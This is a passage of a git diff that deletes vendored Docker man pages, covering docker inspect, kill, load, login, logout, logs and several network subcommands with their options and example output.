-    "HostsPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hosts",
-    "LogPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47-json.log",
-    "Name": "/adoring_wozniak",
-    "RestartCount": 0,
-    "Driver": "devicemapper",
-    "MountLabel": "",
-    "ProcessLabel": "",
-    "Mounts": [
-      {
-        "Source": "/data",
-        "Destination": "/data",
-        "Mode": "ro,Z",
-        "RW": false
-	"Propagation": ""
-      }
-    ],
-    "AppArmorProfile": "",
-    "ExecIDs": null,
-    "HostConfig": {
-        "Binds": null,
-        "ContainerIDFile": "",
-        "Memory": 0,
-        "MemorySwap": 0,
-        "CpuShares": 0,
-        "CpuPeriod": 0,
-        "CpusetCpus": "",
-        "CpusetMems": "",
-        "CpuQuota": 0,
-        "BlkioWeight": 0,
-        "OomKillDisable": false,
-        "Privileged": false,
-        "PortBindings": {},
-        "Links": null,
-        "PublishAllPorts": false,
-        "Dns": null,
-        "DnsSearch": null,
-        "DnsOptions": null,
-        "ExtraHosts": null,
-        "VolumesFrom": null,
-        "Devices": [],
-        "NetworkMode": "bridge",
-        "IpcMode": "",
-        "PidMode": "",
-        "UTSMode": "",
-        "CapAdd": null,
-        "CapDrop": null,
-        "RestartPolicy": {
-            "Name": "no",
-            "MaximumRetryCount": 0
-        },
-        "SecurityOpt": null,
-        "ReadonlyRootfs": false,
-        "Ulimits": null,
-        "LogConfig": {
-            "Type": "json-file",
-            "Config": {}
-        },
-        "CgroupParent": ""
-    },
-    "GraphDriver": {
-        "Name": "devicemapper",
-        "Data": {
-            "DeviceId": "5",
-            "DeviceName": "docker-253:1-2763198-d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47",
-            "DeviceSize": "171798691840"
-        }
-    },
-    "Config": {
-        "Hostname": "d2cc496561d6",
-        "Domainname": "",
-        "User": "",
-        "AttachStdin": true,
-        "AttachStdout": true,
-        "AttachStderr": true,
-        "ExposedPorts": null,
-        "Tty": true,
-        "OpenStdin": true,
-        "StdinOnce": true,
-        "Env": null,
-        "Cmd": [
-            "bash"
-        ],
-        "Image": "fedora",
-        "Volumes": null,
-        "VolumeDriver": "",
-        "WorkingDir": "",
-        "Entrypoint": null,
-        "NetworkDisabled": false,
-        "MacAddress": "",
-        "OnBuild": null,
-        "Labels": {},
-        "Memory": 0,
-        "MemorySwap": 0,
-        "CpuShares": 0,
-        "Cpuset": "",
-        "StopSignal": "SIGTERM"
-    }
-    }
-    ]
-## Getting the IP address of a container instance
-
-To get the IP address of a container use:
-
-    $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' d2cc496561d6
-    172.17.0.2
-
-## Listing all port bindings
-
-One can loop over arrays and maps in the results to produce simple text
-output:
-
-    $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} \
-      {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' d2cc496561d6
-      80/tcp -> 80
-
-You can get more information about how to write a Go template from:
-https://golang.org/pkg/text/template/.
-
-## Getting size information on a container
-
-    $ docker inspect -s d2cc496561d6
-    [
-    {
-    ....
-    "SizeRw": 0,
-    "SizeRootFs": 972,
-    ....
-    }
-    ]
-
-## Getting information on an image
-
-Use an image's ID or name (e.g., repository/name[:tag]) to get information
-about the image:
-
-    $ docker inspect ded7cd95e059
-    [{
-    "Id": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4",
-    "Parent": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731",
-    "Comment": "",
-    "Created": "2015-05-27T16:58:22.937503085Z",
-    "Container": "76cf7f67d83a7a047454b33007d03e32a8f474ad332c3a03c94537edd22b312b",
-    "ContainerConfig": {
-        "Hostname": "76cf7f67d83a",
-        "Domainname": "",
-        "User": "",
-        "AttachStdin": false,
-        "AttachStdout": false,
-        "AttachStderr": false,
-        "ExposedPorts": null,
-        "Tty": false,
-        "OpenStdin": false,
-        "StdinOnce": false,
-        "Env": null,
-        "Cmd": [
-            "/bin/sh",
-            "-c",
-            "#(nop) ADD file:4be46382bcf2b095fcb9fe8334206b584eff60bb3fad8178cbd97697fcb2ea83 in /"
-        ],
-        "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731",
-        "Volumes": null,
-        "VolumeDriver": "",
-        "WorkingDir": "",
-        "Entrypoint": null,
-        "NetworkDisabled": false,
-        "MacAddress": "",
-        "OnBuild": null,
-        "Labels": {}
-    },
-    "DockerVersion": "1.6.0",
-    "Author": "Lokesh Mandvekar \u003clsm5@fedoraproject.org\u003e",
-    "Config": {
-        "Hostname": "76cf7f67d83a",
-        "Domainname": "",
-        "User": "",
-        "AttachStdin": false,
-        "AttachStdout": false,
-        "AttachStderr": false,
-        "ExposedPorts": null,
-        "Tty": false,
-        "OpenStdin": false,
-        "StdinOnce": false,
-        "Env": null,
-        "Cmd": null,
-        "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731",
-        "Volumes": null,
-        "VolumeDriver": "",
-        "WorkingDir": "",
-        "Entrypoint": null,
-        "NetworkDisabled": false,
-        "MacAddress": "",
-        "OnBuild": null,
-        "Labels": {}
-    },
-    "Architecture": "amd64",
-    "Os": "linux",
-    "Size": 186507296,
-    "VirtualSize": 186507296,
-    "GraphDriver": {
-        "Name": "devicemapper",
-        "Data": {
-            "DeviceId": "3",
-            "DeviceName": "docker-253:1-2763198-ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4",
-            "DeviceSize": "171798691840"
-        }
-    }
-    }
-    ]
-
-# HISTORY
-April 2014, originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-April 2015, updated by Qiang Huang <h.huangqiang@huawei.com>
-October 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-kill.1.md b/vendor/github.com/docker/docker/man/docker-kill.1.md
deleted file mode 100644
index 36cbdb90ea..0000000000
--- a/vendor/github.com/docker/docker/man/docker-kill.1.md
+++ /dev/null
@@ -1,28 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-kill - Kill a running container using SIGKILL or a specified signal
-
-# SYNOPSIS
-**docker kill**
-[**--help**]
-[**-s**|**--signal**[=*"KILL"*]]
-CONTAINER [CONTAINER...]
-
-# DESCRIPTION
-
-The main process inside each container specified will be sent SIGKILL,
- or any signal specified with option --signal.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**-s**, **--signal**="*KILL*"
-   Signal to send to the container
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
- based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-load.1.md b/vendor/github.com/docker/docker/man/docker-load.1.md
deleted file mode 100644
index b165173047..0000000000
--- a/vendor/github.com/docker/docker/man/docker-load.1.md
+++ /dev/null
@@ -1,56 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-load - Load an image from a tar archive or STDIN
-
-# SYNOPSIS
-**docker load**
-[**--help**]
-[**-i**|**--input**[=*INPUT*]]
-[**-q**|**--quiet**]
-
-# DESCRIPTION
-
-Loads a tarred repository from a file or the standard input stream.
-Restores both images and tags. Write image names or IDs imported it
-standard output stream.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**-i**, **--input**=""
-   Read from a tar archive file, instead of STDIN. The tarball may be compressed with gzip, bzip, or xz.
-
-**-q**, **--quiet**
-   Suppress the load progress bar but still outputs the imported images.
-
-# EXAMPLES
-
-    $ docker images
-    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-    busybox             latest              769b9341d937        7 weeks ago         2.489 MB
-    $ docker load --input fedora.tar
-    # […]
-    Loaded image: fedora:rawhide
-    # […]
-    Loaded image: fedora:20
-    # […]
-    $ docker images
-    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-    busybox             latest              769b9341d937        7 weeks ago         2.489 MB
-    fedora              rawhide             0d20aec6529d        7 weeks ago         387 MB
-    fedora              20                  58394af37342        7 weeks ago         385.5 MB
-    fedora              heisenbug           58394af37342        7 weeks ago         385.5 MB
-    fedora              latest              58394af37342        7 weeks ago         385.5 MB
-
-# See also
-**docker-save(1)** to save one or more images to a tar archive (streamed to STDOUT by default).
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-July 2015 update by Mary Anthony <mary@docker.com>
-June 2016 update by Vincent Demeester <vincent@sbr.pm>
diff --git a/vendor/github.com/docker/docker/man/docker-login.1.md b/vendor/github.com/docker/docker/man/docker-login.1.md
deleted file mode 100644
index c0d4f795db..0000000000
--- a/vendor/github.com/docker/docker/man/docker-login.1.md
+++ /dev/null
@@ -1,53 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-login - Log in to a Docker registry.
-
-# SYNOPSIS
-**docker login**
-[**--help**]
-[**-p**|**--password**[=*PASSWORD*]]
-[**-u**|**--username**[=*USERNAME*]]
-[SERVER]
-
-# DESCRIPTION
-Log in to a Docker Registry located on the specified
-`SERVER`.  You can specify a URL or a `hostname` for the `SERVER` value. If you
-do not specify a `SERVER`, the command uses Docker's public registry located at
-`https://registry-1.docker.io/` by default.  To get a username/password for Docker's public registry, create an account on Docker Hub.
-
-`docker login` requires user to use `sudo` or be `root`, except when:
-
-1.  connecting to  a remote daemon, such as a `docker-machine` provisioned `docker engine`.
-2.  user is added to the `docker` group.  This will impact the security of your system; the `docker` group is `root` equivalent.  See [Docker Daemon Attack Surface](https://docs.docker.com/engine/articles/security/#docker-daemon-attack-surface) for details.
-
-You can log into any public or private repository for which you have
-credentials.  When you log in, the command stores encoded credentials in
-`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**-p**, **--password**=""
-   Password
-
-**-u**, **--username**=""
-   Username
-
-# EXAMPLES
-
-## Login to a registry on your localhost
-
-    # docker login localhost:8080
-
-# See also
-**docker-logout(1)** to log out from a Docker registry.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-April 2015, updated by Mary Anthony for v2 <mary@docker.com>
-November 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-logout.1.md b/vendor/github.com/docker/docker/man/docker-logout.1.md
deleted file mode 100644
index a8a4b7c3c0..0000000000
--- a/vendor/github.com/docker/docker/man/docker-logout.1.md
+++ /dev/null
@@ -1,32 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-logout - Log out from a Docker registry.
-
-# SYNOPSIS
-**docker logout**
-[SERVER]
-
-# DESCRIPTION
-Log out of a Docker Registry located on the specified `SERVER`. You can
-specify a URL or a `hostname` for the `SERVER` value. If you do not specify a
-`SERVER`, the command attempts to log you out of Docker's public registry
-located at `https://registry-1.docker.io/` by default.  
-
-# OPTIONS
-There are no available options.
-
-# EXAMPLES
-
-## Log out from a registry on your localhost
-
-    # docker logout localhost:8080
-
-# See also
-**docker-login(1)** to log in to a Docker registry server.
-
-# HISTORY
-June 2014, Originally compiled by Daniel, Dao Quang Minh (daniel at nitrous dot io)
-July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-April 2015, updated by Mary Anthony for v2 <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-logs.1.md b/vendor/github.com/docker/docker/man/docker-logs.1.md
deleted file mode 100644
index e70f796e28..0000000000
--- a/vendor/github.com/docker/docker/man/docker-logs.1.md
+++ /dev/null
@@ -1,71 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-logs - Fetch the logs of a container
-
-# SYNOPSIS
-**docker logs**
-[**-f**|**--follow**]
-[**--help**]
-[**--since**[=*SINCE*]]
-[**-t**|**--timestamps**]
-[**--tail**[=*"all"*]]
-CONTAINER
-
-# DESCRIPTION
-The **docker logs** command batch-retrieves whatever logs are present for
-a container at the time of execution. This does not guarantee execution
-order when combined with a docker run (i.e., your run may not have generated
-any logs at the time you execute docker logs).
-
-The **docker logs --follow** command combines commands **docker logs** and
-**docker attach**. It will first return all logs from the beginning and
-then continue streaming new output from the container's stdout and stderr.
-
-**Warning**: This command works only for the **json-file** or **journald**
-logging drivers.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**--details**=*true*|*false*
-   Show extra details provided to logs
-
-**-f**, **--follow**=*true*|*false*
-   Follow log output. The default is *false*.
-
-**--since**=""
-   Show logs since timestamp
-
-**-t**, **--timestamps**=*true*|*false*
-   Show timestamps. The default is *false*.
-
-**--tail**="*all*"
-   Output the specified number of lines at the end of logs (defaults to all logs)
-
-The `--since` option can be Unix timestamps, date formatted timestamps, or Go
-duration strings (e.g. `10m`, `1h30m`) computed relative to the client machine's
-time. Supported formats for date formatted time stamps include RFC3339Nano,
-RFC3339, `2006-01-02T15:04:05`, `2006-01-02T15:04:05.999999999`,
-`2006-01-02Z07:00`, and `2006-01-02`. The local timezone on the client will be
-used if you do not provide either a `Z` or a `+-00:00` timezone offset at the
-end of the timestamp.  When providing Unix timestamps enter
-seconds[.nanoseconds], where seconds is the number of seconds that have elapsed
-since January 1, 1970 (midnight UTC/GMT), not counting leap  seconds (aka Unix
-epoch or Unix time), and the optional .nanoseconds field is a fraction of a
-second no more than nine digits long. You can combine the `--since` option with
-either or both of the `--follow` or `--tail` options.
-
-The `docker logs --details` command will add on extra attributes, such as
-environment variables and labels, provided to `--log-opt` when creating the
-container.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-April 2015, updated by Ahmet Alp Balkan <ahmetalpbalkan@gmail.com>
-October 2015, updated by Mike Brown <mikebrow@gmail.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-connect.1.md b/vendor/github.com/docker/docker/man/docker-network-connect.1.md
deleted file mode 100644
index 096ec77a4d..0000000000
--- a/vendor/github.com/docker/docker/man/docker-network-connect.1.md
+++ /dev/null
@@ -1,66 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% OCT 2015
-# NAME
-docker-network-connect - connect a container to a network
-
-# SYNOPSIS
-**docker network connect**
-[**--help**]
-NETWORK CONTAINER
-
-# DESCRIPTION
-
-Connects a container to a network. You can connect a container by name
-or by ID. Once connected, the container can communicate with other containers in
-the same network.
-
-```bash
-$ docker network connect multi-host-network container1
-```
-
-You can also use the `docker run --network=<network-name>` option to start a container and immediately connect it to a network.
-
-```bash
-$ docker run -itd --network=multi-host-network --ip 172.20.88.22 --ip6 2001:db8::8822 busybox
-```
-You can pause, restart, and stop containers that are connected to a network.
-A container connects to its configured networks when it runs.
-
-If specified, the container's IP address(es) is reapplied when a stopped
-container is restarted. If the IP address is no longer available, the container
-fails to start. One way to guarantee that the IP address is available is
-to specify an `--ip-range` when creating the network, and choose the static IP
-address(es) from outside that range. This ensures that the IP address is not
-given to another container while this container is not on the network.
-
-```bash
-$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network
-```
-
-```bash
-$ docker network connect --ip 172.20.128.2 multi-host-network container2
-```
-
-To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network.
-
-Once connected in network, containers can communicate using only another
-container's IP address or name. For `overlay` networks or custom plugins that
-support multi-host connectivity, containers connected to the same multi-host
-network but launched from different Engines can also communicate in this way.
-
-You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container bridge and overlay networks.
-
-
-# OPTIONS
-**NETWORK**
-  Specify network name
-
-**CONTAINER**
-  Specify container name
-
-**--help**
-  Print usage statement
-
-# HISTORY
-OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-create.1.md b/vendor/github.com/docker/docker/man/docker-network-create.1.md
deleted file mode 100644
index 44ce8e15c2..0000000000
--- a/vendor/github.com/docker/docker/man/docker-network-create.1.md
+++ /dev/null
@@ -1,187 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% OCT 2015
-# NAME
-docker-network-create - create a new network
-
-# SYNOPSIS
-**docker network create**
-[**--attachable**]
-[**--aux-address**=*map[]*]
-[**-d**|**--driver**=*DRIVER*]
-[**--gateway**=*[]*]
-[**--help**]
-[**--internal**]
-[**--ip-range**=*[]*]
-[**--ipam-driver**=*default*]
-[**--ipam-opt**=*map[]*]
-[**--ipv6**]
-[**--label**[=*[]*]]
-[**-o**|**--opt**=*map[]*]
-[**--subnet**=*[]*]
-NETWORK-NAME
-
-# DESCRIPTION
-
-Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the
-built-in network drivers. If you have installed a third party or your own custom
-network driver you can specify that `DRIVER` here also. If you don't specify the
-`--driver` option, the command automatically creates a `bridge` network for you.
-When you install Docker Engine it creates a `bridge` network automatically. This
-network corresponds to the `docker0` bridge that Engine has traditionally relied
-on. When launch a new container with  `docker run` it automatically connects to
-this bridge network. You cannot remove this default bridge network but you can
-create new ones using the `network create` command.
-
-```bash
-$ docker network create -d bridge my-bridge-network
-```
-
-Bridge networks are isolated networks on a single Engine installation. If you
-want to create a network that spans multiple Docker hosts each running an
-Engine, you must create an `overlay` network. Unlike `bridge` networks overlay
-networks require some pre-existing conditions before you can create one. These
-conditions are:
-
-* Access to a key-value store. Engine supports Consul, Etcd, and Zookeeper (Distributed store) key-value stores.
-* A cluster of hosts with connectivity to the key-value store.
-* A properly configured Engine `daemon` on each host in the cluster.
-
-The `dockerd` options that support the `overlay` network are:
-
-* `--cluster-store`
-* `--cluster-store-opt`
-* `--cluster-advertise`
-
-To read more about these options and how to configure them, see ["*Get started
-with multi-host
-network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay/).
-
-It is also a good idea, though not required, that you install Docker Swarm on to
-manage the cluster that makes up your network. Swarm provides sophisticated
-discovery and server management that can assist your implementation.
-
-Once you have prepared the `overlay` network prerequisites you simply choose a
-Docker host in the cluster and issue the following to create the network:
-
-```bash
-$ docker network create -d overlay my-multihost-network
-```
-
-Network names must be unique. The Docker daemon attempts to identify naming
-conflicts but this is not guaranteed. It is the user's responsibility to avoid
-name conflicts.
-
-## Connect containers
-
-When you start a container use the `--network` flag to connect it to a network.
-This adds the `busybox` container to the `mynet` network.
-
-```bash
-$ docker run -itd --network=mynet busybox
-```
-
-If you want to add a container to a network after the container is already
-running use the `docker network connect` subcommand.
-
-You can connect multiple containers to the same network. Once connected, the
-containers can communicate using only another container's IP address or name.
-For `overlay` networks or custom plugins that support multi-host connectivity,
-containers connected to the same multi-host network but launched from different
-Engines can also communicate in this way.
-
-You can disconnect a container from a network using the `docker network
-disconnect` command.
-
-## Specifying advanced options
-
-When you create a network, Engine creates a non-overlapping subnetwork for the
-network by default. This subnetwork is not a subdivision of an existing network.
-It is purely for ip-addressing purposes. You can override this default and
-specify subnetwork values directly using the `--subnet` option. On a
-`bridge` network you can only create a single subnet:
-
-```bash
-$ docker network create -d bridge --subnet=192.168.0.0/16 br0
-```
-
-Additionally, you also specify the `--gateway` `--ip-range` and `--aux-address`
-options.
-
-```bash
-$ docker network create \
-  --driver=bridge \
-  --subnet=172.28.0.0/16 \
-  --ip-range=172.28.5.0/24 \
-  --gateway=172.28.5.254 \
-  br0
-```
-
-If you omit the `--gateway` flag the Engine selects one for you from inside a
-preferred pool. For `overlay` networks and for network driver plugins that
-support it you can create multiple subnetworks.
-
-```bash
-$ docker network create -d overlay \
-  --subnet=192.168.0.0/16 \
-  --subnet=192.170.0.0/16 \
-  --gateway=192.168.0.100 \ 
-  --gateway=192.170.0.100 \
-  --ip-range=192.168.1.0/24 \
-  --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \
-  --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \
-  my-multihost-network
-```
-
-Be sure that your subnetworks do not overlap. If they do, the network create
-fails and Engine returns an error.
-
-### Network internal mode
-
-By default, when you connect a container to an `overlay` network, Docker also
-connects a bridge network to it to provide external connectivity. If you want
-to create an externally isolated `overlay` network, you can specify the
-`--internal` option.
-
-# OPTIONS
-**--attachable**
-  Enable manual container attachment
-
-**--aux-address**=map[]
-  Auxiliary IPv4 or IPv6 addresses used by network driver
-
-**-d**, **--driver**=*DRIVER*
-  Driver to manage the Network bridge or overlay. The default is bridge.
-
-**--gateway**=[]
-  IPv4 or IPv6 Gateway for the master subnet
-
-**--help**
-  Print usage
-
-**--internal**
-  Restrict external access to the network
-
-**--ip-range**=[]
-  Allocate container ip from a sub-range
-
-**--ipam-driver**=*default*
-  IP Address Management Driver
-
-**--ipam-opt**=map[]
-  Set custom IPAM driver options
-
-**--ipv6**
-  Enable IPv6 networking
-
-**--label**=*label*
-   Set metadata for a network
-
-**-o**, **--opt**=map[]
-  Set custom driver options
-
-**--subnet**=[]
-  Subnet in CIDR format that represents a network segment
-
-# HISTORY
-OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md b/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md
deleted file mode 100644
index 09bcac51b0..0000000000
--- a/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md
+++ /dev/null
@@ -1,36 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% OCT 2015
-# NAME
-docker-network-disconnect - disconnect a container from a network
-
-# SYNOPSIS
-**docker network disconnect**
-[**--help**]
-[**--force**]
-NETWORK CONTAINER
-
-# DESCRIPTION
-
-Disconnects a container from a network.
-
-```bash
-  $ docker network disconnect multi-host-network container1
-```
-
-
-# OPTIONS
-**NETWORK**
-  Specify network name
-
-**CONTAINER**
-    Specify container name
-
-**--force**
-  Force the container to disconnect from a network
-
-**--help**
-  Print usage statement
-
-# HISTORY
-OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-inspect.1.md b/vendor/github.com/docker/docker/man/docker-network-inspect.1.md
deleted file mode 100644
index f27c98cb34..0000000000
--- a/vendor/github.com/docker/docker/man/docker-network-inspect.1.md
+++ /dev/null
@@ -1,112 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% OCT 2015
-# NAME
-docker-network-inspect - inspect a network
-
-# SYNOPSIS
-**docker network inspect**
-[**-f**|**--format**[=*FORMAT*]]
-[**--help**]
-NETWORK [NETWORK...]
-
-# DESCRIPTION
-
-Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network:
-
-```bash
-$ sudo docker run -itd --name=container1 busybox
-f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27
-
-$ sudo docker run -itd --name=container2 busybox
-bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727
-```
-
-The `network inspect` command shows the containers, by id, in its
-results. You can specify an alternate format to execute a given
-template for each result. Go's
-[text/template](http://golang.org/pkg/text/template/) package
-describes all the details of the format.
-
-```bash
-$ sudo docker network inspect bridge
-[
-    {
-        "Name": "bridge",
-        "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f",
-        "Scope": "local",
-        "Driver": "bridge",
-        "IPAM": {
-            "Driver": "default",
-            "Config": [
-                {
-                    "Subnet": "172.17.42.1/16",
-                    "Gateway": "172.17.42.1"
-                }
-            ]
-        },
-        "Internal": false,
-        "Containers": {
-            "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": {
-                "Name": "container2",
-                "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019",
-                "MacAddress": "02:42:ac:11:00:02",
-                "IPv4Address": "172.17.0.2/16",
-                "IPv6Address": ""
-            },
-            "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": {
-                "Name": "container1",
-                "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad",
-                "MacAddress": "02:42:ac:11:00:01",
-                "IPv4Address": "172.17.0.1/16",
-                "IPv6Address": ""
-            }
-        },
-        "Options": {
-            "com.docker.network.bridge.default_bridge": "true",
-            "com.docker.network.bridge.enable_icc": "true",
-            "com.docker.network.bridge.enable_ip_masquerade": "true",
-            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
-            "com.docker.network.bridge.name": "docker0",
-            "com.docker.network.driver.mtu": "1500"
-        }
-    }
-]
-```
-
-Returns the information about the user-defined network:
-
-```bash
-$ docker network create simple-network
-69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a
-$ docker network inspect simple-network
-[
-    {
-        "Name": "simple-network",
-        "Id": "69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a",
-        "Scope": "local",
-        "Driver": "bridge",
-        "IPAM": {
-            "Driver": "default",
-            "Config": [
-                {
-                    "Subnet": "172.22.0.0/16",
-                    "Gateway": "172.22.0.1"
-                }
-            ]
-        },
-        "Containers": {},
-        "Options": {}
-    }
-]
-```
-
-# OPTIONS
-**-f**, **--format**=""
-  Format the output using the given Go template.
-
-**--help**
-  Print usage statement
-
-# HISTORY
-OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-ls.1.md b/vendor/github.com/docker/docker/man/docker-network-ls.1.md
deleted file mode 100644
index f319e66035..0000000000
--- a/vendor/github.com/docker/docker/man/docker-network-ls.1.md
+++ /dev/null
@@ -1,188 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% OCT 2015
-# NAME
-docker-network-ls - list networks
-
-# SYNOPSIS
-**docker network ls**
-[**-f**|**--filter**[=*[]*]]
-[**--format**=*"TEMPLATE"*]
-[**--no-trunc**[=*true*|*false*]]
-[**-q**|**--quiet**[=*true*|*false*]]
-[**--help**]
-
-# DESCRIPTION
-
-Lists all the networks the Engine `daemon` knows about. This includes the
-networks that span across multiple hosts in a cluster, for example:
-
-```bash
-    $ docker network ls
-    NETWORK ID          NAME                DRIVER          SCOPE
-    7fca4eb8c647        bridge              bridge          local
-    9f904ee27bf5        none                null            local
-    cf03ee007fb4        host                host            local
-    78b03ee04fc4        multi-host          overlay         swarm
-```
-
-Use the `--no-trunc` option to display the full network id:
-
-```bash
-$ docker network ls --no-trunc
-NETWORK ID                                                         NAME                DRIVER
-18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3   none                null                
-c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47   host                host                
-7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185   bridge              bridge              
-95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd   foo                 bridge    
-63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161   dev                 bridge
-```
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there
-is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`).
-Multiple filter flags are combined as an `OR` filter. For example, 
-`-f type=custom -f type=builtin` returns both `custom` and `builtin` networks.
-
-The currently supported filters are:
-
-* driver
-* id (network's id)
-* label (`label=<key>` or `label=<key>=<value>`)
-* name (network's name)
-* type (custom|builtin)
-
-#### Driver
-
-The `driver` filter matches networks based on their driver.
-
-The following example matches networks with the `bridge` driver:
-
-```bash
-$ docker network ls --filter driver=bridge
-NETWORK ID          NAME                DRIVER
-db9db329f835        test1               bridge
-f6e212da9dfd        test2               bridge
-```
-
-#### ID
-
-The `id` filter matches on all or part of a network's ID.
-
-The following filter matches all networks with an ID containing the
-`63d1ff1f77b0...` string.
-
-```bash
-$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161
-NETWORK ID          NAME                DRIVER
-63d1ff1f77b0        dev                 bridge
-```
-
-You can also filter for a substring in an ID as this shows:
-
-```bash
-$ docker network ls --filter id=95e74588f40d
-NETWORK ID          NAME                DRIVER
-95e74588f40d        foo                 bridge
-
-$ docker network ls --filter id=95e
-NETWORK ID          NAME                DRIVER
-95e74588f40d        foo                 bridge
-```
-
-#### Label
-
-The `label` filter matches networks based on the presence of a `label` alone or a `label` and a
-value.
-
-The following filter matches networks with the `usage` label regardless of its value.
-
-```bash
-$ docker network ls -f "label=usage"
-NETWORK ID          NAME                DRIVER
-db9db329f835        test1               bridge              
-f6e212da9dfd        test2               bridge
-```
-
-The following filter matches networks with the `usage` label with the `prod` value.
-
-```bash
-$ docker network ls -f "label=usage=prod"
-NETWORK ID          NAME                DRIVER
-f6e212da9dfd        test2               bridge
-```
-
-#### Name
-
-The `name` filter matches on all or part of a network's name.
-
-The following filter matches all networks with a name containing the `foobar` string.
-
-```bash
-$ docker network ls --filter name=foobar
-NETWORK ID          NAME                DRIVER
